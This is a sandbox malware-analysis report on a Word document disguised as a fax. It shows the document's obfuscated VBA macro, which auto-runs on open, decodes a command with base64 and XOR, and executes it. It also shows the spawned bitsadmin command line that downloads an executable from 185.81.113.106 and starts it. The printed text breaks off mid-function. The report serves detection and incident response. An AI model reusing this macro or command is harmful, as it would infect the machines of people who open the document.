fax-120717_094384372834792.doc
This report is generated from a file or URL submitted to this webservice on December 7th 2017 16:34:44 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v7.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence
  - Spawns a lot of processes
- Fingerprint
  - Reads the active computer name
  - Reads the cryptographic machine GUID
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 9
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 5/60 Antivirus vendors marked sample as malicious (8% detection rate)
- 2/35 Antivirus vendors marked sample as malicious (5% detection rate)
- source
- External System
- relevance
- 8/10
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
The analysis extracted a file that was identified as malicious
- details
- 6/65 Antivirus vendors marked dropped file "urlref_http185.81.113.106L33LMj7.exe" as malicious (classified as "QVM03.0.B013.Malware" with 9% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Installation/Persistence
-
Utilizes bitsadmin (possibly used for persistence)
- details
- Process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
- Process "bitsadmin.exe" with commandline "bitsadmin /create /download j2"
- Process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt"
- Process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0"
- Process "bitsadmin.exe" with commandline "bitsadmin /resume j2"
- Process "bitsadmin.exe" with commandline "bitsadmin /complete j2"
- source
- Monitored Target
- relevance
- 5/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string that indicates auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- File/Memory
- relevance
- 10/10
-
Spawns a lot of processes
- details
- Spawned process "WINWORD.EXE" with commandline "/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc""
- Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2"
- Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2"
- source
- Monitored Target
- relevance
- 8/10
-
Hiding 1 Malicious Indicators
-
Suspicious Indicators 6
-
Environment Awareness
-
Reads the active computer name
- details
- "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- "bitsadmin.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- "bitsadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 5/65 reputation engines marked "http://185.81.113.106" as malicious (7% detection rate)
- source
- External System
- relevance
- 10/10
-
Installation/Persistence
-
Drops executable files
- details
- "urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Network Related
-
Found potential IP address in binary/memory
- details
- Heuristic match: "Added http://185.81.113.106/indexsdfgfdsafdefsdd.php -> %TEMP%\1.txt to job."
- Heuristic match: "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe"
- Heuristic match: "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt"
- source
- File/Memory
- relevance
- 3/10
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
- Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
- Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
- source
- Static Parser
- relevance
- 10/10
-
Informative 19
-
Environment Awareness
-
Reads the registry for installed applications
- source
- Registry Access
- relevance
- 10/10
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Function f535970() As Long
On Error Resume Next
Dim v457985 As String, v654922 As String, v276489 As String, v888744 As Long, v699685 As Long, v633871 As Variant, v800367 As Variant, v196217 As Variant, v360979 As Long
v654922 = "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"
v457985 = "5IwUVX0fIScrD2j4sKb6hXKbtLKAapN4VuHHyl0BLO88VdCI2RHCzGYYXcGSXT6AtUOITF5h3zDo9rpeSsbSEGKZo2Pch94067qiPmgxggJmkH9Da9VRodthHSrIQV1dV0vnHPTx4sFNbCbABJ6S41GVuJBOQqAuEr6VPu8G7XX7fi1OzxSfuec8ndpL7L8LXnVvj5HmSfijqBA2a3iiiLLLR9jIx4LHFbl7ckSiOwKlh3shOqmpwBjlBtgwJ4gpkBqVw5UgHjKK3WrB3vy00sI97soadEyK60t9KvDAhY4iHVfPEcDVCXN5XqOjPwb3EntVqhY9Y3jV8xgS1GVSazWl4odJFzf4CKAxp8ge5rR1Ao2Q0VYh1o7omZ"
v276489 = "8peq9zGUh9foXNZYyWQm3TjtlfnvDX6EEWxHfAHjJClZaVcNK1PlcfhHenvp1ZYiwZRBDN1uGEkkgvfUzG3s6d9Fe1YCeNdYNbipSRUHNZ4qJO02cOkWc8oeJOSYK8Fe46UOCAkYKKd87mnrcUfFn8tts9JGo5Ii6IOEGyJQdOjQZa0vbcibSaFzzk7bFPbPrG8Erooqt01mw2xYnPEdi04DRtdYB4WeFXHPpOFKSaQqI7YFhceQCeSmvLKAZH95l31x4"
v800367 = "87"
v268930 = "34"
v196217 = "76"
v633871 = "41"
v633871 = Int(v268930)
v633871 = Log(v800367)
v196217 = v196217 * v268930
v888744 = 3 + 8
'Amet pariatur veniam duis amet occaecat Lorem.
v633871 = v268930 + v633871
'Cupidatat quis cillum mollit mollit nisi aliqua quis consequat veniam sint eu quis excepteur nisi.
'Exercitation eiusmod consectetur minim sit qui nulla aliqua. Voluptate id veniam ut cillum cupidatat mollit reprehenderit ea officia exercitation.
v196217 = v633871 - v196217
v360979 = 2 + 4
v268930 = v633871 - v633871
'Aliqua cillum aute labore et duis sunt cillum culpa aliquip cupidatat reprehenderit voluptate magna.
'In irure officia enim qui fugiat cillum dolor.
For i = 0 To 238742364 Step 1
v699685 = v699685 + v888744 - v360979
Next i
'Labore enim consequat amet occaecat elit reprehenderit proident consequat Lorem duis. Reprehenderit veniam veniam voluptate in laboris voluptate occaecat esse.
'Velit ex nostrud ullamco magna incididunt et.
v196217 = RGB(27, 73, 191)
'Esse veniam est occaecat adipisicing ipsum Lorem duis id eiusmod.
f535970 = v699685
End Function
Function f619350() As Long
On Error Resume Next
Dim v399231 As String, v735914 As Long, v710638 As String, v150022 As String, v295955 As Variant, v534234 As Variant, v915810 As Long, v632543 As Variant
Dim v368495(0 To 4) As String
v368495(0) = "UXpwY1VISnZaM0poYlVSaGRHRmM="
v368495(1) = "UXpwY1VISnZaM0poYlVSaGRHRmNOdz09"
v368495(2) = "UXpwY1VISnZaM0poYlVSaGRHRmNjV0ZUUW04NFlqST0="
v368495(3) = "UXpwY1VISnZaM0poYlVSaGRHRmNXbTEyVGtSak4wSjFNVzQyUkE9PQ=="
v368495(4) = "UXpwY1VISnZaM0poYlVSaGRHRmNRVmRUVW5KUk1sYzU="
v150022 = "2rO7rtIruCZY3r0Yr2XrnJzdgdirZ10sy4qYkjIUjBIA4i3xLeGizYkFxJx9VpUYhhF31E1RzbtxSKm92A5Y9fIZDJSKXDHIAswDtHewgnikvc97xaC0Gx7p35AYegGGwzpjh1lDkctOWBtzjNqBUTwUpczuogHoqopQkoGlS58i2RFrcoU5bj0OCfI640cAeW1oYPj06JZfvdBYqsbFIOXBw18I7Z5Enzab79nFB8U4HKRAxRD64byHInBsqWmS2EuraCxLoRnuNJzYxr0G8e7nrcsGhsVAONdHeaxfTpKjcZPix6ET9UiXEnUnUotsKoAE6CpCnnyGq2LN6eDJm3DtYda5zXaOUij8oyfKc4ET1q4vTN0IIG9GiG73XVBU56LZ8lf6AmjDOzNkgg53NVSzVDVmo82hPDGuogOpyHtRUSbzv6eklPKhTCBXsilCWBU0paZ1DuZbgydKbrK8RdlnNsZpORZV4hAdplN0LF2Wn8c0hlGZ4gUrKkIUz63LRQUs4D8lh7OWzjAGfNg4Jn6yrlsdeen820oc0ut1hmGtR5GUXjj8TphHp0Tdq7le"
v710638 = "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"
v295955 = "82"
v534234 = "86"
'Occaecat do enim anim adipisicing in eiusmod anim proident est aliquip reprehenderit dolore commodo.
v295955 = v534234 - v534234
v534234 = Sin(v295955)
For i = 0 To 4 Step 1
'Cillum incididunt irure ut tempor. Nulla Lorem cupidatat mollit aute laboris mollit aliquip.
v295955 = v295955 + v534234
'Occaecat dolore dolore elit in. Dolore cillum aute labore dolor ea velit.
v399231 = f245997(f245997(v368495(i)))
v295955 = v295955 + v534234
v295955 = Exp(v295955)
v295955 = v534234 + v534234
v295955 = v295955 + v534234
If Dir(v399231, vbDirectory) = "" Then
'Cillum aliquip anim do consequat quis.
v534234 = Cos(v295955)
'Consectetur elit ad duis anim esse laborum id dolor reprehenderit enim.
v534234 = Exp(v295955)
'Proident proident non consectetur proident proident cupidatat reprehenderit est ut. Irure nulla proident reprehenderit esse dolore aliquip et proident duis.
v735914 = v735914 = 111
v915810 = v735914
'Irure dolore quis irure incididunt quis laborum. Ullamco incididunt qui id irure in sunt reprehenderit sint nisi duis ad culpa cupidatat sit.
'Ea minim anim excepteur cupidatat nostrud esse pariatur quis dolor id quis incididunt occaecat in. Est laborum culpa fugiat qui ad exercitation.
v534234 = v295955 + v295955
'Commodo excepteur enim reprehenderit Lorem eu laboris eu sint cupidatat Lorem dolor incididunt magna. Veniam ipsum aliqua fugiat do.
Else
v735914 = 408
v915810 = v735914
Exit For
v295955 = Asc(v150022)
v534234 = Atn(v534234)
v295955 = v534234 + v534234
'Dolore eu exercitation excepteur ipsum ea commodo proident sunt labore minim magna commodo aute sunt. Commodo quis minim exercitation commodo tempor culpa ex dolore sunt consequat in officia velit.
End If
Next i
v534234 = v295955 + v295955
v534234 = v534234 + v534234
'Velit in est adipisicing irure et laborum ut eu do sit non in. Ex fugiat ex velit dolor ad.
'Minim adipisicing ad reprehenderit est labore incididunt culpa minim reprehenderit.
'Sunt magna incididunt nisi aliquip eu occaecat elit sint.
If v735914 < 104 + 146 Then
v915810 = f535970
'Magna do qui cupidatat eiusmod amet voluptate.
'Id non ea commodo ad. Excepteur adipisicing dolor nulla in irure consectetur fugiat magna ad adipisicing ex quis eu.
v534234 = v295955 + v295955
f560483 (v915810)
v295955 = Atn(v295955)
'Cillum in aute esse nisi commodo ut esse enim id.
v534234 = Cos(v534234)
Else
v735914 = 340
End If
f619350 = v735914
End Function
Sub Document_Open()
On Error Resume Next
Dim v121919 As Variant, v538623 As String, v427540 As Variant, v771268 As Variant, v914102 As String, v805286 As Variant, v125215 As String, Var_5 As Variant
v125215 = "HUmkSzvqBVhNzyVCEHIDJ0VSX8bBe8WtTkrD3lW952PXOpDVkCsWgc0m51hEWpD8hsUGS3ocf0ubon8JnpFYXW7CHozvRWIo1KsoX32uapbTF42F52604CO6fIjgVbBb3RZU67fxPbxqioRxQARRKiimZVNCyXtGEBvzJeziUc6IqkDf2VLswAEU3IF7cNEhQWkjqhwFxtXcm5xASKWN46qslcxcGy4bejXnZPBWfnhsSNBexZf1IuvUm1P1n9G8jnC6Ty5EWbHFmG4UCTj4VshkOkTfhcg80rop8OCZdaWrGhqgJH6n23PULvwAKpoKgFSgEJyQ"
v538623 = "admprReQadSVz2VgozjBKtczF3u1j4F1DeaF9wyILLgUcaittlJ0hrCnA1aTiNFkcOdVFkrjJJbNa4QAjensZeoGQWceUK8CXofJ2QJWCVEouBnuA6zZJoT1O3JzIpAX7o9Nu5fROltjYpAx6SYuwAe3ygxQZ5VoqU9q6xG0e3SK35noXan1SuIiTkgncR50xunjzR8YxLCY1YVhLs"
v914102 = "cLqKiiStInxYxLdU9PA8KTfBzzx7jiyDmJYdDnHbcGaFnlPBr4zXYRWlfWpjY5j2AUrsvpD13AHhQorKaB77qj190nlWXZL1mryUQEKiHDsE4rn0fpWs2zXm9x9DgBxiRTClwITYxr32awqVb2xvQmkYBLAnuOkDnmZ4fwIUGyuut"
v427540 = "100"
v805286 = "52"
v771268 = "93"
v121919 = "41"
v623978 = "67"
Call f92167
v121919 = v771268 + v427540
'Deserunt aliquip ipsum reprehenderit occaecat incididunt. Velit mollit reprehenderit veniam reprehenderit ad irure consequat dolor eu non culpa ut et.
'Nisi sunt pariatur non et ex eiusmod consequat minim id.
'Tempor dolor eiusmod quis velit ullamco ipsum adipisicing ad.
Call f92167
'Enim eiusmod ad ad qui consectetur deserunt ea esse anim tempor pariatur proident.
v121919 = v427540 - v771268
'Quis est qui consequat ad. Exercitation elit in officia et qui do mollit occaecat.
v771268 = Int(v805286)
'Id incididunt enim occaecat reprehenderit.
v805286 = v805286 - v771268
v623978 = v771268 - v121919
'Cillum veniam minim tempor non sint do quis dolor enim commodo.
Call f619350
v623978 = v805286 - v427540
v771268 = Sin(v771268)
v121919 = v623978 + v427540
'Aliquip culpa eu labore proident cupidatat veniam culpa. Nostrud ullamco laboris excepteur veniam culpa labore ut irure do aliqua et.
'Voluptate dolore eu fugiat sunt id velit non in eu Lorem ut voluptate ullamco dolor.
v805286 = Atn(v121919)
'Pariatur consectetur laborum quis minim cillum dolor proident dolor culpa aute sit.
'Velit cupidatat cupidatat aliquip nisi anim occaecat. Nisi in Lorem Lorem dolor.
Call f624191
'Proident irure nostrud laborum ullamco dolor. Ex Lorem pariatur eiusmod velit culpa veniam occaecat Lorem Lorem Lorem eiusmod exercitation.
'Et eiusmod occaecat mollit consequat eu voluptate. Qui qui proident ullamco sit id ullamco cupidatat id incididunt incididunt occaecat reprehenderit.
v427540 = Sqr(v623978)
'Est in eiusmod labore exercitation id ullamco duis sunt pariatur veniam. Id aute esse enim laboris cupidatat occaecat deserunt veniam aliqua nulla est laborum nisi.
'Occaecat nisi ipsum qui ullamco consectetur cillum officia occaecat excepteur duis ex.
v623978 = RGB(122, 117, 189)
v805286 = Fix(v623978)
'Id et Lorem aute eiusmod exercitation exercitation proident laboris ut officia esse non duis. Amet ipsum magna in enim amet quis cillum ea ex veniam sit laborum pariatur mollit.
v623978 = v771268 + v771268
'Reprehenderit est id in minim sunt deserunt minim reprehenderit nulla aliquip nisi sunt.
v805286 = v623978 + v121919
'Adipisicing qui elit eiusmod commodo laboris sunt amet sunt sunt officia ex. Occaecat irure laborum aute eiusmod cillum aute et in pariatur.
v623978 = Exp(v771268)
'Aliquip excepteur ad elit reprehenderit duis labore consectetur duis minim officia labore ut ullamco ex. Consequat sint adipisicing eiusmod aute dolore et proident proident.
'Irure nisi adipisicing mollit cupidatat et ullamco nostrud Lorem deserunt anim et veniam consectetur.
End Sub
Function f92167() As Long
On Error Resume Next
Dim v930682 As String, v181932 As Variant, v530875 As Variant, v742279 As String, v240057 As Variant, v133308 As Variant, v504342 As String, Var_5 As Variant
v742279 = "3xTokYVxpfOnIfp4Zvf7XmSOm6XxxihIfZDAdQCHJv1oGyrxpO8Xke77jU4gBqhUp8W2XzJr0zBg5xg2heJsr3FTGldk6mCjipRRo37aXg7qpdnpHLv7aOD1Ca8o9hQvU11JS8oEffvcW1K2C0pdGNtL9qa9eRcEopZpxOJEwE5Y7lHxU90Zs6"
v504342 = "O3mJR71aV1DGK5Rpk5mY7nIfxa5xkXypz2A36gHxtWuAUjDmGENdAFxxjlnKeTheT3d1HSJLPPU5zC1KDKzXgjvQhI7jZVCxFGFINlK8tN8mz3FGQrNGzgEJnAJnVfku0erBjF1TvLxbt8ZGKDrFy7qFtjdlk0wzJ5lYV7k86gtLHeQTKdC7vq8mYcvgauB7t6PmiY1E5B9YZAZiEs1baTOszxLladna0"
v930682 = "ndawXX5ZqZ3trgHxxhpDhqX5i3E6PCJlVCnjeEmO672mLYfIGC8nkn6vPA8gSS1tsBy7Fafqgl5kbKOc6v83FSJxyyhX1sqtthBCFKgFyoYy"
v181932 = "76"
v240057 = "65"
v133308 = "26"
v530875 = "88"
v442572 = "38"
v442572 = v442572 - v240057
v240057 = v530875 + v442572
v240057 = Sgn(v240057)
'Nisi amet incididunt aliquip id do duis ullamco ea excepteur ad ullamco ut.
'Fugiat cillum qui ullamco esse deserunt duis aliqua incididunt ad. Irure velit ea ad commodo irure aliqua.
f92167 = 1
End Function
Function f560483(num_x As Long) As Long
On Error Resume Next
Dim v664867 As Long, v152021 As Long, v847141 As Variant, v615031 As Long, v631517 As String, v572717 As String, v758456 As String, v877340 As Variant, v349656 As Variant, v71433 As String, v562180 As Variant, v240427 As String, v135778 As Variant
v71433 = "kGTzwjKFHSPLzf4gDqXLp4z8KGm2Rmp3wNxQjksipAr0RULSYkgQRWAAUugUWLoGPS2w45vjRvRFWzSl0GHYckvWbHOYgFSRH5oj"
v631517 = "HyF7Rd7bjOQBaenYsLyDyDFnr3ERqFnVebocsuujLUxvzD1rUuCXW61NUnGD8hUJKIdEAI0HI186awy15pwTCh7sDkcPfHeG0pzBXs45"
v562180 = "33"
v349656 = "98"
v877340 = "53"
v135778 = "62"
'Amet laborum elit irure sint eiusmod laborum nostrud magna.
'Dolore quis deserunt consequat laborum.
'Lorem velit incididunt amet mollit incididunt id. Quis reprehenderit nulla nostrud sit eu dolore ea enim magna ea cupidatat duis.
v877340 = Int(v562180)
'Laboris proident fugiat id ut anim culpa et qui magna.
'Ut irure laboris proident incididunt id in reprehenderit et sint amet Lorem officia ex.
'Tempor ex reprehenderit adipisicing irure eiusmod mollit excepteur aliqua nisi est labore ipsum in nostrud.
v135778 = Abs(v135778)
v135778 = Abs(v135778)
'Tempor eu laborum adipisicing fugiat fugiat aliquip consequat. Eu deserunt qui laboris id veniam laborum ad ut pariatur nisi non nostrud amet eiusmod.
'Non culpa do eu laboris anim culpa dolor sunt.
v877340 = Exp(v135778)
v758456 = "UtC3Q2yAInK7igzl167S9lmImPRmCZzuNSuXxVJzAkKUSZrUbddhOL75XoKqIJ5JjEaCZqUhdhWOxflQshatAqN54v5URODSlVbhTJCrpbFdjpvo6Fp0jKAdlniokhjhHuBjRIzxqv8XAqsW99Pc19HWcgP6Oo89JYBR5IFsjcw8UGRsRU9Pjv8CLc5aFRGTZtAlmzR3dLJLBRXpgtD0Z84jiXSbCyLFcKLkFRvQtR7Stltwpi5WlRCa9ZQzT44oX3cNjO3uj8liZPogqG3jYyxfcib9UasigdPary8RVYeJhewTNfCneirxIwf1Ur5Vs2IuY3UqGIPxij"
v240427 = "MThAMTIxQDEyMkAzMkA3QDM4QDI5QDEyN0AxN0AyNEAxMEA2MUAxOEA1MEA5QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEAyNUA1MEAxOEAyOEAxMjZANDlAMTdAMzhAMjlANTBAMkAxMkAzNkA1MUAyQDEyQDM1QDEyM0A0N0AzQDEwQDEyNUA3QDUwQDExNUA1MUA0QDE1QDMwQDYyQDRAMTVAMTRANjJANkAzMUAxNEA0OUA3QDMzQDE0QDYwQDVAMzRAMTE0QDZANkA0OUA1QDZAMzFAMjhAMzZAMTIwQDdAMzhAMjlAMTI3QDE3QDI0QDEwQDM5QDI5QDE0QDI5QDVAMzBAOEAzMEA2MUA2QDI0QDEy"
v240427 = v240427 + "NkAzOUA0NkAxMkAzMEA0NEAxQDM4QDFANTlANDdAM0A1QDM1QDE3QDEyQDEyMkA1OUA0MUAzNEAxMEA2MUAxOEAxMjBAMUAzOUAxOEAxOUAyNUAzOUAyQDhAMTE0QDMyQDQxQDEyMEA0N0A2MkA0MUAxMkAxMTRAMzVAMTdAOEA5QDU4QDZAMzRAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDM1QDE3QDEyQDI1QDM4QDQyQDI4QDUxQDM5QDJAMTJAMzZANTBAMkAxMkAzNUAxMjNANDdAM0AxMEAxMjVAN0A1MEAxMTVANTFANEAxNUAzMEA2MkA0QDE1QDE0QDYyQDZAMzFAMTRANDlAN0Az"
v240427 = v240427 + "M0AxNEA2MEA1QDM0QDExNEA1OUA0MUAzOEAyNUAzOUA0NkAzQDVAMzJAMTdAMzhANDdAMzhAMTdAM0A1QDM1QDE3QDM4QDI1QDM5QDE3QDM3QDVAMzJAMTdAOEAxMjZANjBANDJAM0AxMEA0NEAxQDI5QDI1QDEzQDMxQDI5QDEwQDM5QDdANDlAMTRANjJANDdAM0AzNUAxMjNAMkA4QDE3QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEA1QDM5QDQ3QDEyQDVAMTIyQDQwQDEyMEAyNUA2MUA0MUAyOEAzNUAzOUAxOEAyOEAyNUAzOUA0MEAzN0A2QDQ0QDQyQDMzQDJANDRAMjlAMTlANUAzOUA0MEAz"
v240427 = v240427 + "NEAxMjJAOUAxN0AxMjFAMjlANjJANDdAMTVANTlANUA0MUAxMjBANTlANTlANDFAMTJANTFAMzVAN0A0OUAyNkA2MkA2QDhAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDUwQDE3QDE5QDVAMTIyQDQxQDI4QDMwQDQ0QDQyQDMzQDJANDRAMUAzOEAxQDU5QDQ3QDNANUAzNUAxN0AxMkAxMjJANTlANDFAMzRAMTBANjFAMThAMTIxQDExNEA2M0A0MEAxMkA1MUAzOUA0N0AxMkAzMEA0NEA0MkAzM0AyQDQ0QDFAMzRAMThANDRANDBAMTIwQDI1QDM1QDQwQDM3QDI2QDQ0QDFAMjlAMjVA"
v240427 = v240427 + "MTNAMzFAMjlAMTBAMzlAN0A0OUAxNEA2MkAxN0AxOUAzNUAzOUA0NkAzQDM1QDEyNw=="
v575024 = Str(num_x)
'Officia sint consequat nulla do duis pariatur sint duis nulla adipisicing laboris dolor. Laborum duis exercitation voluptate voluptate.
'Consequat amet ea amet excepteur nostrud sunt est sit anim id quis commodo ea incididunt.
'Tempor consectetur occaecat eu ipsum dolor veniam sit duis adipisicing duis sit et id.
'Dolor aliqua ut nisi veniam qui elit. Nostrud do laborum eiusmod duis magna fugiat sit fugiat Lorem occaecat.
'Anim ad cillum et dolore et pariatur ut elit commodo dolor voluptate laborum. Enim veniam pariatur cupidatat id esse est quis dolore nulla fugiat officia voluptate ea anim.
v152021 = Val(Mid(v575024, 2, 2))
'Esse ea ipsum nulla aute nostrud aute eiusmod aliquip id. Magna duis exercitation do et id.
'Est incididunt consequat nostrud eiusmod laborum esse minim eu deserunt duis deserunt.
'Reprehenderit et dolore veniam ea cupidatat sint incididunt aute consectetur velit dolore laboris elit. Dolore elit fugiat id do.
v615031 = Asc(Mid(v758456, v152021, 1))
v135778 = v349656 + v877340
'Fugiat labore incididunt velit esse consectetur sunt Lorem dolor enim sunt.
v135778 = v135778 + v349656
v349656 = Tan(v349656)
'Eiusmod anim culpa amet est reprehenderit sit consequat.
v572717 = f245997(v240427)
v349656 = Cos(v349656)
'Do duis ullamco aute ullamco fugiat.
'Occaecat tempor id qui reprehenderit Lorem duis veniam ipsum laboris quis laborum duis. Quis do in anim nostrud irure.
'Eiusmod sint esse qui laboris sit ad.
v847141 = Split(v572717, "@")
'Officia aliquip dolore dolor culpa nulla anim incididunt consequat voluptate ipsum. Magna in ex mollit laborum voluptate qui qui id consectetur enim elit exercitation minim nulla.
v349656 = v562180 + v877340
v135778 = v135778 + v562180
'Consectetur magna ullamco culpa nostrud commodo occaecat quis aliquip proident.
For i = 0 To (UBound(v847141) - LBound(v847141)) Step 1
v664867 = (v847141(i) Xor v615031)
v5727172 = v5727172 + CStr(Chr(v664867))
Next i
v562180 = Int(v877340)
v135778 = Asc(v71433)
'Elit voluptate et ullamco amet pariatur aliquip mollit.
v877340 = Sqr(v877340)
'Voluptate nisi ullamco aliqua mollit et cillum excepteur officia deserunt proident elit id.
v877340 = v562180 + v877340
'Consequat officia cillum tempor velit excepteur aliquip reprehenderit dolore ad deserunt. Culpa dolore culpa deserunt labore magna excepteur mollit mollit veniam fugiat non esse magna.
v877340 = v349656 + v349656
v877340 = v349656 + v349656
v572717 = f245997(v5727172)
v135778 = v135778 - v562180
'Sint ut enim est occaecat et esse.
'Aliquip incididunt ullamco aliqua nostrud proident laborum eiusmod ad commodo irure. Dolor est ea excepteur est non ipsum sunt laboris et.
v135778 = v349656 + v877340
v135778 = v562180 + v562180
v349656 = v349656 + v349656
'Cupidatat irure cupidatat sunt commodo veniam do consectetur ut.
A1DX = Shell(Left(v572717, Len(v572717) - 2), 0)
'Sint et minim ipsum sint nisi ad Lorem cillum quis officia cupidatat. Mollit nulla ut aliqua dolore ex laboris occaecat excepteur sit occaecat commodo.
v135778 = v135778 + v349656
v349656 = v135778 + v135778
'Tempor do ut adipisicing duis quis do ipsum deserunt.
v562180 = Abs(v562180)
v562180 = v349656 + v135778
v562180 = Sqr(v349656)
'Sint aliqua velit sunt exercitation duis occaecat consequat.
v562180 = Sgn(v877340)
v877340 = v877340 + v349656
v562180 = RGB(194, 185, 103)
'Est Lorem qui cupidatat velit.
'Lorem quis enim non esse fugiat.
AS1 = 48
'Minim adipisicing mollit ullamco aliqua enim nulla dolore ullamco irure irure.
v135778 = v135778 + v349656
'Enim qui culpa deserunt magna. Sunt ullamco incididunt sint laboris velit.
'Irure Lorem aliquip ea magna irure est. Ullamco est magna duis irure consectetur.
v135778 = v562180 + v562180
v877340 = v562180 + v135778
v349656 = v562180 + v349656
'Culpa ad irure aliqua reprehenderit enim exercitation ipsum exercitation tempor adipisicing mollit cupidatat. Ad sunt voluptate cillum tempor incididunt commodo sunt ea aliqua irure velit do minim aliquip.
'Aute ullamco elit nostrud magna cillum voluptate irure esse mollit incididunt dolor velit non. Consequat veniam ut amet est.
v349656 = v877340 + v562180
'Incididunt minim ullamco dolore duis non exercitation consequat.
'Nulla ut eiusmod amet deserunt ut sunt est esse ullamco magna. Proident non eiusmod anim labore proident laboris minim ea anim enim culpa.
'Incididunt velit ad id deserunt. Ipsum laborum laboris amet adipisicing ipsum velit anim dolore dolore culpa irure.
'Aliquip sunt ad ex sunt aute tempor do amet.
'Consequat non ex sint enim duis tempor nisi est anim excepteur occaecat qui.
'Ex officia laboris enim anim ex fugiat ipsum. Magna ipsum nisi nulla aute aute id enim irure et elit quis.
'Ex fugiat fugiat elit pariatur eu laboris laboris ut laboris magna dolore adipisicing.
v135778 = v562180 - v135778
'Adipisicing et nostrud excepteur est voluptate non. Dolore id ipsum laborum magna elit aliquip quis.
'Sunt in consequat dolor exercitation mollit aliquip Lorem est sint consectetur sunt. Aute labore exercitation commodo incididunt incididunt velit culpa enim laboris qui non sint occaecat non.
v349656 = v135778 + v562180
'Minim exercitation culpa laborum ex id. Aliquip exercitation ex laborum ipsum anim.
v135778 = v349656 + v877340
End Function
Function f245997(ByVal v100243)
On Error Resume Next
Dim v269444 As Variant, v376987 As Variant, v842208 As Variant, v330126 As Variant, v151497 As String, v668744 As String, v335244 As String, Var_5 As Variant
v151497 = "V29fCUC1YatOjF9SVlkFdXokxfcKf9axvix8QEZZNSEnQD3marcfNJHpp73VSj9BkUiL75ZhNl4KYPb2Lo3a1IUA7devkK2sSoJAsYWQeqSs81kjjZZni7jyg9wTSgkLxxQW8zVwxwKYbvFOivPkWSm3518d2YAyEc37r46OBxrKDfFWHZcEwIgFq5dh7rggZDsi0qSNwYliTDntOpbiF7DZjHWUk4gKFBFB6EFX5a6FcKIR60yxrJCQhsvZkTkJ3g0J3OVAPgwjByViGvOFxESXitzLz1isyVQt758Si2yBmJcogorwm4SWSEecbNj6n9rb5CIg"
